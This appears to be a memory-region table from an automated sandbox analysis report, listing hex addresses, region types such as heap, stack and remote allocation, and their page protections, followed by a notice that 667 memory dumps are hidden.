heap
page read and write
2A084C43000
heap
page read and write
5D4000
heap
page read and write
1BCE0AF6000
heap
page read and write
95DD000
stack
page read and write
7FFAACA14000
trusted library allocation
page read and write
2C60000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
86C000
stack
page read and write
1BCC686E000
heap
page read and write
2A084CA9000
heap
page read and write
7230000
direct allocation
page read and write
9720000
direct allocation
page read and write
2A0848C0000
heap
page read and write
80A1000
trusted library allocation
page read and write
2A084CB7000
heap
page read and write
25A0000
heap
page read and write
2A084C39000
heap
page read and write
2255F000
stack
page read and write
74F0000
trusted library allocation
page read and write
6BD000
stack
page read and write
2A084CB3000
heap
page read and write
6F77000
heap
page read and write
7FFAACD50000
trusted library allocation
page read and write
2A084C7F000
heap
page read and write
9700000
direct allocation
page read and write
1BCC898C000
trusted library allocation
page read and write
7240000
direct allocation
page read and write
AC041BE000
stack
page read and write
2A084718000
heap
page read and write
1BCC8481000
trusted library allocation
page read and write
1BCC8B55000
trusted library allocation
page read and write
B10000
heap
page read and write
3CB0000
remote allocation
page execute and read and write
72E0000
heap
page read and write
7FFAACCB0000
trusted library allocation
page read and write
7FFB1E100000
unkown
page read and write
7210000
heap
page read and write
2A08471B000
heap
page read and write
73C8D000
unkown
page read and write
1BCC6893000
heap
page read and write
2A084C2D000
heap
page read and write
7560000
trusted library allocation
page read and write
1BCE087F000
heap
page read and write
2A084722000
heap
page read and write
1BCC8440000
heap
page execute and read and write
6F77000
heap
page read and write
2A084710000
heap
page read and write
6655000
remote allocation
page execute and read and write
6E90000
heap
page read and write
461C000
stack
page read and write
9EBB8FF000
stack
page read and write
BCE5000
direct allocation
page execute and read and write
2A082CAE000
heap
page read and write
2A084CCB000
heap
page read and write
AC04E0B000
stack
page read and write
90B0000
trusted library allocation
page read and write
71B0000
direct allocation
page read and write
7112000
heap
page read and write
2DE7000
heap
page read and write
22A60000
heap
page read and write
7FFAACBC1000
trusted library allocation
page read and write
5D2000
heap
page read and write
2A084C83000
heap
page read and write
2291E000
stack
page read and write
6F39000
heap
page read and write
7FFB1E102000
unkown
page readonly
2C42000
trusted library allocation
page read and write
2A084C11000
heap
page read and write
ACE000
stack
page read and write
2BB5000
heap
page read and write
1BCC68D5000
heap
page read and write
2A082CBA000
heap
page read and write
2A084C91000
heap
page read and write
47FC000
trusted library allocation
page read and write
4660000
heap
page execute and read and write
1BCC86A8000
trusted library allocation
page read and write
4B7F000
stack
page read and write
2A084742000
heap
page read and write
2A084C83000
heap
page read and write
AC03D7E000
stack
page read and write
AC03CFE000
stack
page read and write
2A084D35000
heap
page read and write
7FFAACCF0000
trusted library allocation
page read and write
2A084722000
heap
page read and write
1BCE07CA000
heap
page read and write
2A084742000
heap
page read and write
B50000
heap
page read and write
74D0000
trusted library allocation
page execute and read and write
278E000
stack
page read and write
1BCE0AA8000
heap
page read and write
6EF2000
heap
page read and write
7FA0000
trusted library allocation
page read and write
1BCCA2A3000
trusted library allocation
page read and write
6FF0000
heap
page read and write
6F4A000
heap
page read and write
1A3479F0000
heap
page read and write
7FFAACB30000
trusted library allocation
page execute and read and write
2A082F25000
heap
page read and write
1BCC8909000
trusted library allocation
page read and write
2A084C47000
heap
page read and write
1BCC8507000
trusted library allocation
page read and write
9660000
direct allocation
page read and write
2A084DB3000
heap
page read and write
2A082CE2000
heap
page read and write
AC03FBC000
stack
page read and write
4AFE000
stack
page read and write
7370000
trusted library allocation
page read and write
2A084C87000
heap
page read and write
6C2D000
stack
page read and write
1BCCA30E000
trusted library allocation
page read and write
7FFB1E105000
unkown
page readonly
2C20000
trusted library allocation
page read and write
8296000
trusted library allocation
page read and write
4B3E000
stack
page read and write
7FFAACBD0000
trusted library allocation
page execute and read and write
74A8000
trusted library allocation
page read and write
2A084840000
remote allocation
page read and write
24FF18B0000
heap
page read and write
1A347D85000
heap
page read and write
2A082C56000
heap
page read and write
9640000
trusted library allocation
page read and write
2A082C00000
heap
page read and write
1BCC6891000
heap
page read and write
1BCC8285000
heap
page read and write
2A084C38000
heap
page read and write
2A084718000
heap
page read and write
2A08473A000
heap
page read and write
1BCC9D4A000
trusted library allocation
page read and write
EB4BEFB000
stack
page read and write
1FD000
stack
page read and write
7F80000
heap
page read and write
49FD000
stack
page read and write
2DE3000
heap
page read and write
7FFAACC10000
trusted library allocation
page read and write
47A1000
trusted library allocation
page read and write
7FFAACD40000
trusted library allocation
page read and write
2A082C20000
heap
page read and write
2A084C7F000
heap
page read and write
1BCE0816000
heap
page read and write
AC03C7E000
stack
page read and write
2A082D11000
heap
page read and write
959E000
stack
page read and write
1BCCA326000
trusted library allocation
page read and write
7DF4ECEB0000
trusted library allocation
page execute and read and write
EB4BCFE000
stack
page read and write
4790000
heap
page read and write
7FFAACCD0000
trusted library allocation
page read and write
1A347AF0000
heap
page read and write
2CAE000
stack
page read and write
96F0000
direct allocation
page read and write
7FFB1E102000
unkown
page readonly
1BCE0950000
heap
page read and write
801D000
stack
page read and write
2A082D11000
heap
page read and write
2A084C6C000
heap
page read and write
2A084718000
heap
page read and write
6F4A000
heap
page read and write
7FFAACC80000
trusted library allocation
page read and write
93F6000
heap
page read and write
2A084C41000
heap
page read and write
4D9000
stack
page read and write
1BCE0A8D000
heap
page read and write
920000
heap
page read and write
6E6B000
stack
page read and write
A00000
heap
page read and write
7FFB1E0F6000
unkown
page readonly
71F0000
direct allocation
page read and write
9650000
direct allocation
page read and write
722A000
heap
page read and write
2A082CAE000
heap
page read and write
2A082CA1000
heap
page read and write
2A084C3B000
heap
page read and write
49B000
stack
page read and write
2A084C43000
heap
page read and write
72DB000
heap
page read and write
2A082D16000
heap
page read and write
2A084CCB000
heap
page read and write
723A000
heap
page read and write
2A084840000
remote allocation
page read and write
2A082C6E000
heap
page read and write
2A084CBE000
heap
page read and write
AC04C0E000
stack
page read and write
72D3000
heap
page read and write
4CDE000
stack
page read and write
226EF000
stack
page read and write
1BCCA1BF000
trusted library allocation
page read and write
1BCC8140000
heap
page read and write
7FFAACBF2000
trusted library allocation
page read and write
7FFAACA30000
trusted library allocation
page read and write
2A084727000
heap
page read and write
2D95000
heap
page read and write
6F4A000
heap
page read and write
9610000
trusted library allocation
page read and write
2265E000
stack
page read and write
8020000
heap
page read and write
6F6E000
heap
page read and write
5255000
remote allocation
page execute and read and write
96C0000
direct allocation
page read and write
6B1F000
stack
page read and write
1BCE07C0000
heap
page read and write
2A084711000
heap
page read and write
1BCC6897000
heap
page read and write
2CF0000
heap
page readonly
B90000
trusted library allocation
page read and write
9EBB87C000
stack
page read and write
1BCD8769000
trusted library allocation
page read and write
BAD000
trusted library allocation
page execute and read and write
935C000
stack
page read and write
1BCE08AC000
heap
page read and write
4ABB000
stack
page read and write
931E000
stack
page read and write
6D2E000
stack
page read and write
2A08473F000
heap
page read and write
9360000
heap
page read and write
AC04C8E000
stack
page read and write
A4E000
stack
page read and write
2A082CAE000
heap
page read and write
2A084742000
heap
page read and write
2A084CE1000
heap
page read and write
73C71000
unkown
page execute read
8030000
trusted library allocation
page execute and read and write
3E55000
remote allocation
page execute and read and write
9690000
direct allocation
page read and write
7EFB0000
trusted library allocation
page execute and read and write
AC03E3E000
stack
page read and write
1BCCA2D2000
trusted library allocation
page read and write
1BCCA29B000
trusted library allocation
page read and write
96E0000
direct allocation
page read and write
2A084C91000
heap
page read and write
6DAE000
stack
page read and write
2A084C6C000
heap
page read and write
1BCD8778000
trusted library allocation
page read and write
1BCC8912000
trusted library allocation
page read and write
2ADF000
stack
page read and write
1BCCA2B7000
trusted library allocation
page read and write
2A084C2D000
heap
page read and write
7F90000
trusted library allocation
page execute and read and write
2A084CB4000
heap
page read and write
2A084CC4000
heap
page read and write
7FFB1E0E0000
unkown
page readonly
5935000
trusted library allocation
page read and write
465E000
stack
page read and write
93B7000
heap
page read and write
4799000
heap
page read and write
2A08472E000
heap
page read and write
1BCCA52E000
trusted library allocation
page read and write
2A084C91000
heap
page read and write
256D000
stack
page read and write
8050000
heap
page read and write
7F77000
stack
page read and write
1BCCA2D0000
trusted library allocation
page read and write
2A084719000
heap
page read and write
6F6E000
heap
page read and write
1BCE07C2000
heap
page read and write
281E000
unkown
page read and write
A8F000
stack
page read and write
6FAE000
stack
page read and write
1BCC6903000
heap
page read and write
2A084718000
heap
page read and write
2261D000
stack
page read and write
7FFAACD80000
trusted library allocation
page read and write
1BCC8293000
heap
page read and write
7FFAACAF6000
trusted library allocation
page execute and read and write
7FFAACAC6000
trusted library allocation
page read and write
1BCCA440000
trusted library allocation
page read and write
9670000
direct allocation
page read and write
2A084722000
heap
page read and write
1BCC68F1000
heap
page read and write
4A3E000
stack
page read and write
2A08475E000
heap
page read and write
2A082F28000
heap
page read and write
96B0000
trusted library allocation
page execute and read and write
2A084C43000
heap
page read and write
2A084C47000
heap
page read and write
2D20000
heap
page read and write
1BCC6995000
heap
page read and write
7500000
trusted library allocation
page read and write
291F000
unkown
page read and write
2A082D11000
heap
page read and write
2A084CD4000
heap
page read and write
2A084C83000
heap
page read and write
1BCC8410000
heap
page execute and read and write
2A082CCB000
heap
page read and write
1BCCA312000
trusted library allocation
page read and write
1BCC81B0000
trusted library allocation
page read and write
2A084CCB000
heap
page read and write
2A084CA2000
heap
page read and write
1BCC6887000
heap
page read and write
9710000
direct allocation
page read and write
1BCE08D7000
heap
page execute and read and write
6B9E000
stack
page read and write
29AFCFD000
stack
page read and write
7219000
heap
page read and write
EB4B58A000
stack
page read and write
AC03F39000
stack
page read and write
2A084733000
heap
page read and write
7FFAACCA0000
trusted library allocation
page read and write
2272E000
stack
page read and write
1BCD84A1000
trusted library allocation
page read and write
2A084715000
heap
page read and write
741E000
stack
page read and write
93BF000
heap
page read and write
1BCC8170000
trusted library allocation
page read and write
6E2D000
stack
page read and write
24FF1820000
heap
page read and write
1BCC8190000
trusted library allocation
page read and write
2A084719000
heap
page read and write
2A082D11000
heap
page read and write
6CAE000
stack
page read and write
2A084C42000
heap
page read and write
2A084742000
heap
page read and write
7FFAACCC0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
7FFAACA20000
trusted library allocation
page read and write
2A084742000
heap
page read and write
2A082C4F000
heap
page read and write
7180000
heap
page read and write
EB4BBFE000
stack
page read and write
2C3A000
trusted library allocation
page execute and read and write
7360000
trusted library allocation
page read and write
26E0000
heap
page read and write
1BCC8280000
heap
page read and write
AC04D8B000
stack
page read and write
588000
heap
page read and write
809E000
stack
page read and write
2A084C80000
heap
page read and write
2A084742000
heap
page read and write
2A084CBE000
heap
page read and write
1BCC684E000
heap
page read and write
1BCC8921000
trusted library allocation
page read and write
93F2000
heap
page read and write
2A084C47000
heap
page read and write
713E000
stack
page read and write
7FFAACAD0000
trusted library allocation
page execute and read and write
2A084CF3000
heap
page read and write
5809000
trusted library allocation
page read and write
6F4A000
heap
page read and write
26B0000
heap
page read and write
45D0000
trusted library allocation
page read and write
EB4B8FE000
stack
page read and write
1BCC8935000
trusted library allocation
page read and write
24FF33B0000
heap
page read and write
929C000
stack
page read and write
2A084C6C000
heap
page read and write
2A082D16000
heap
page read and write
1A347C20000
heap
page read and write
71C0000
direct allocation
page read and write
2D9F000
heap
page read and write
46CE000
stack
page read and write
AC03743000
stack
page read and write
7FFAACC60000
trusted library allocation
page read and write
227D0000
remote allocation
page read and write
4D5C000
stack
page read and write
75A0000
trusted library allocation
page read and write
BA0000
trusted library allocation
page read and write
EB4C1FB000
stack
page read and write
1BCC6840000
heap
page read and write
1BCE0E30000
heap
page read and write
7FFAACD20000
trusted library allocation
page read and write
7FFB1E0E1000
unkown
page execute read
2A084742000
heap
page read and write
1BCC8925000
trusted library allocation
page read and write
25D0000
heap
page read and write
92DB000
stack
page read and write
1BCC6820000
heap
page read and write
73C86000
unkown
page readonly
2A082F28000
heap
page read and write
4780000
heap
page execute and read and write
9620000
trusted library allocation
page read and write
48F9000
trusted library allocation
page read and write
2A084C47000
heap
page read and write
73DE000
stack
page read and write
7FFAACA10000
trusted library allocation
page read and write
2A084CD4000
heap
page read and write
1BCC8220000
trusted library allocation
page read and write
1BCE07D1000
heap
page read and write
1BCCA27D000
trusted library allocation
page read and write
7FFAACAC0000
trusted library allocation
page read and write
70BE000
stack
page read and write
2A082D16000
heap
page read and write
6F11000
heap
page read and write
2A084C3B000
heap
page read and write
1BCE0841000
heap
page read and write
2A084CA2000
heap
page read and write
74A0000
trusted library allocation
page read and write
550000
heap
page read and write
2A084D60000
heap
page read and write
4660000
heap
page read and write
6F3A000
heap
page read and write
2D56000
heap
page read and write
2A084CD4000
heap
page read and write
1BCCA29F000
trusted library allocation
page read and write
2A084715000
heap
page read and write
1BCC8937000
trusted library allocation
page read and write
1BCC6740000
heap
page read and write
2A082C90000
heap
page read and write
7FFAACD10000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
1BCC68D1000
heap
page read and write
2A084C47000
heap
page read and write
1BCD8490000
trusted library allocation
page read and write
1BCC891D000
trusted library allocation
page read and write
71A0000
heap
page readonly
1BCE0848000
heap
page read and write
470E000
stack
page read and write
4D1F000
stack
page read and write
2A08472B000
heap
page read and write
9EBB97F000
stack
page read and write
7FFAACD30000
trusted library allocation
page read and write
2A084C11000
heap
page read and write
8040000
trusted library allocation
page read and write
2A082D03000
heap
page read and write
7272000
heap
page read and write
1BCE07C6000
heap
page read and write
2A082C33000
heap
page read and write
7FFAACCE0000
trusted library allocation
page read and write
24FF1810000
heap
page read and write
6F6E000
heap
page read and write
7250000
direct allocation
page read and write
B0E000
stack
page read and write
6F2E000
stack
page read and write
295E000
stack
page read and write
2A084CD4000
heap
page read and write
7200000
direct allocation
page read and write
73C8F000
unkown
page readonly
29AFDFF000
unkown
page read and write
2A084C91000
heap
page read and write
AC03B7E000
stack
page read and write
5CD000
heap
page read and write
24FF1B25000
heap
page read and write
7FFB1E100000
unkown
page read and write
9730000
direct allocation
page read and write
2DBC000
heap
page read and write
1A347B2A000
heap
page read and write
1BCC6990000
heap
page read and write
57C9000
trusted library allocation
page read and write
2A084742000
heap
page read and write
6E95000
heap
page read and write
2A082C7C000
heap
page read and write
A8E5000
direct allocation
page execute and read and write
7FFAACC70000
trusted library allocation
page read and write
2A08471F000
heap
page read and write
7FFB1E105000
unkown
page readonly
2C40000
trusted library allocation
page read and write
226AE000
stack
page read and write
45C0000
trusted library allocation
page read and write
1BCD8481000
trusted library allocation
page read and write
2A084DE0000
heap
page read and write
AC03AFE000
stack
page read and write
2A084713000
heap
page read and write
7352000
trusted library allocation
page read and write
2251E000
stack
page read and write
6F3A000
heap
page read and write
1BCCA27A000
trusted library allocation
page read and write
7FFAACBE0000
trusted library allocation
page execute and read and write
2A084742000
heap
page read and write
24FF18B8000
heap
page read and write
EB4BDFD000
stack
page read and write
96A0000
direct allocation
page read and write
1BCC894B000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
AC0423B000
stack
page read and write
6EB8000
heap
page read and write
540000
heap
page read and write
29D0000
heap
page read and write
7570000
trusted library allocation
page read and write
6F2E000
heap
page read and write
2A082CAE000
heap
page read and write
2A082D16000
heap
page read and write
2A084C91000
heap
page read and write
BA3000
trusted library allocation
page execute and read and write
2A082F20000
heap
page read and write
73C70000
unkown
page readonly
6F4A000
heap
page read and write
1BCC6866000
heap
page read and write
2A084C83000
heap
page read and write
7000000
heap
page read and write
2A082C57000
heap
page read and write
26EC000
heap
page read and write
2A082C8D000
heap
page read and write
93A7000
heap
page read and write
2280E000
stack
page read and write
2BB0000
heap
page read and write
2A082CBA000
heap
page read and write
925D000
stack
page read and write
228DC000
stack
page read and write
7510000
trusted library allocation
page read and write
7550000
trusted library allocation
page read and write
1BCC8D3F000
trusted library allocation
page read and write
6F35000
heap
page read and write
1BCC6940000
heap
page read and write
1BCE08D0000
heap
page execute and read and write
1BCC81A0000
heap
page readonly
75EB000
stack
page read and write
6B5E000
stack
page read and write
2D62000
heap
page read and write
7530000
trusted library allocation
page read and write
1BCCA291000
trusted library allocation
page read and write
2A084718000
heap
page read and write
7FFAACC30000
trusted library allocation
page read and write
24FF1840000
heap
page read and write
7FFAACD60000
trusted library allocation
page read and write
24FF1B20000
heap
page read and write
1A347D80000
heap
page read and write
580000
heap
page read and write
2D2E000
heap
page read and write
6D6A000
stack
page read and write
1BCC68A7000
heap
page read and write
7FFAACA2B000
trusted library allocation
page read and write
2A084C6C000
heap
page read and write
2D00000
heap
page read and write
2A084CBB000
heap
page read and write
72F3000
heap
page read and write
1BCC8915000
trusted library allocation
page read and write
2A084C7F000
heap
page read and write
6C6B000
stack
page read and write
1BCC6870000
heap
page read and write
EB4B9FE000
stack
page read and write
6F39000
heap
page read and write
6EB0000
heap
page read and write
1A347D84000
heap
page read and write
1A347AD0000
heap
page read and write
AC03DF7000
stack
page read and write
1BCC81E0000
trusted library allocation
page read and write
1BCC8D58000
trusted library allocation
page read and write
6CEE000
stack
page read and write
AC037CE000
stack
page read and write
7FFAACD70000
trusted library allocation
page read and write
8A8000
stack
page read and write
749D000
stack
page read and write
2A084D60000
heap
page read and write
2A082BE0000
heap
page read and write
9380000
heap
page read and write
474E000
stack
page read and write
7380000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
72A0000
heap
page read and write
71E0000
direct allocation
page read and write
2A084CCB000
heap
page read and write
1BCE0858000
heap
page read and write
B60000
heap
page read and write
96D0000
direct allocation
page read and write
4D9C000
stack
page read and write
2A084719000
heap
page read and write
1BCC68CF000
heap
page read and write
2A082CC7000
heap
page read and write
6F37000
heap
page read and write
2A084C10000
heap
page read and write
225DD000
stack
page read and write
90A0000
trusted library allocation
page read and write
1BCC8D80000
trusted library allocation
page read and write
1BCC8CFC000
trusted library allocation
page read and write
2A084C6C000
heap
page read and write
4670000
trusted library allocation
page read and write
7FFAACC50000
trusted library allocation
page read and write
2276E000
stack
page read and write
BA4000
trusted library allocation
page read and write
1BCC8D19000
trusted library allocation
page read and write
2284F000
stack
page read and write
2CEE000
stack
page read and write
6DED000
stack
page read and write
7260000
direct allocation
page read and write
2289B000
stack
page read and write
227D0000
remote allocation
page read and write
6EA0000
heap
page read and write
7590000
trusted library allocation
page read and write
57A1000
trusted library allocation
page read and write
7FFAACC20000
trusted library allocation
page read and write
1BCC8D72000
trusted library allocation
page read and write
7FFB1E0F6000
unkown
page readonly
2D00000
heap
page read and write
2A084742000
heap
page read and write
2C30000
trusted library allocation
page read and write
1BCE0818000
heap
page read and write
2B0E000
stack
page read and write
1BCC8D27000
trusted library allocation
page read and write
2A084D8E000
heap
page read and write
2295F000
stack
page read and write
82AC000
trusted library allocation
page read and write
AC04D0D000
stack
page read and write
2A082C7C000
heap
page read and write
2A084C47000
heap
page read and write
7FFAACA1D000
trusted library allocation
page execute and read and write
2A084C7F000
heap
page read and write
2C45000
trusted library allocation
page execute and read and write
7FFB1E0E0000
unkown
page readonly
6F1D000
heap
page read and write
7FFAACD00000
trusted library allocation
page read and write
There are 667 hidden memdumps, click here to show them.